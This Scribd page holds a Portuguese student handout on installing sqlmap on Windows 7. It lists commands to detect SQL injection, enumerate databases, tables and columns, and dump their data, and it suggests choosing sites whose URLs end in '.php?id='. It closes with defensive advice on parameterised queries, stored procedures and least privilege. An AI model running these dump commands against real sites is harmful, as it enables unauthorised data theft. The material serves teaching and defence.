Scribd Logo
Fazer o upload

Bem-vindo(a) ao Scribd!

  • SQL-MAP Roteiro Andre

    Enviado por

    Valdecir Márcia Neoqeav
    27 visualizações2 páginas
    SQL-MAP Roteiro Andre

    Direitos autorais

    © © All Rights Reserved

    Formatos disponíveis

    PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    Denunciar este documento
    SQL-MAP Roteiro Andre

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    27 visualizações2 páginas

    SQL-MAP Roteiro Andre

    Enviado por

    Valdecir Márcia Neoqeav
    SQL-MAP Roteiro Andre

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    de 2

    Instalando e configurando o SQLMAP no

    Windows 7
    Andr Barbieri Redes de Computador SENAC

    SQLMAP: Ferramenta de cdigo fonte aberto desenvolvida em


    python para teste de penetrao que detecta e explora as
    vulnerabilidades a injeo de SQL.
    Injeo SQL ou SQL Injector: Ameaa de segurana que se
    aproveita de falhas em sistemas que interagem com bases de
    dados via SQL.

    Passos para Instalao e funcionamento do Sql Map.


    1- Fazer
    download
    do
    SqlMap
    pelo
    link
    https://github.com/sqlmapproject/sqlmap/zipball/master.
    2. Fazer download do Python 2.7.6 pelo link
    http://www.python.org/ftp/python/2.7.6/python2.7.6.amd64.msi e instalar.
    3. Para facilitar os procedimentos ser necessrio extrair o
    arquivo zip na raiz da unidade C e renomear o diretrio
    para sqlmap como, por exemplo: c:/sqlmap/
    4. Abra o prompt de comando e acesse o diretrio
    C:/sqlmap/.
    4.1. Para colocar o sqlmap em funcionamento digite o
    seguintes comandos:
    Testar a vulnerabilidade e encontrar as databases:
    sqlmap.py u link do site dbs

    Visualizar as tabelas:

    sqlmap.py

    -u

    link

    do

    site

    -D

    sqlmap.py

    -u

    lnk

    do

    site

    -D

    nomedadatabase tables

    Visualizar as colunas:

    nomedadatabase -T tabelaquevocequer columns

    Buscar informao da coluna:

    sqlmap.py -u link do site -D

    nomedadatabase -T tabelaquevocequer -C colunaquevocequer --dump


    Obs: De preferncia sites com terminaes

    .php?id=

    Algumas informaes importantes para evitar os


    ataques SQL.
    Parametrizao das consultas: Quando a parametrizao SIMPLE est em vigor, voc no
    pode controlar quais consultas so parametrizadas e quais no so. No entanto, voc pode
    especificar que todas as consultas em um banco de dados sejam parametrizadas definindo a
    opo de banco de dados PARAMETERIZATION como FORCED. Esse processo denominado
    parametrizao forada.
    Usar stored procedures: coleo de comandos em SQL para dispensa mento de Banco de
    dados. Encapsula tarefas repetitivas, aceita parmetros de entrada e retorna um valor de
    status (para indicar aceitao ou falha na execuo). O procedimento armazenado pode
    reduzir o trfego na rede, visto que os comandos so executados diretamente no servidor.
    Alm de melhorar a performance, criar mecanismos de segurana entre a manipulao dos
    dados do Banco de Dados.
    Limitar privilgio ao acesso: Manter apenas os privilgios e acessos necessrios.
    Referncias:
    Instalao
    sqlmap:
    vulnerabilidades-sqli/

    http://inf0security.wordpress.com/2012/12/24/usando-sqlmap-em-

    Comandos Sqlmap: http://pastebin.com/9CHBMjVq


    Sql Injector: http://wiki.locaweb.com.br/pt-br/Como_se_proteger_do_SQL_Injection

    Você também pode gostar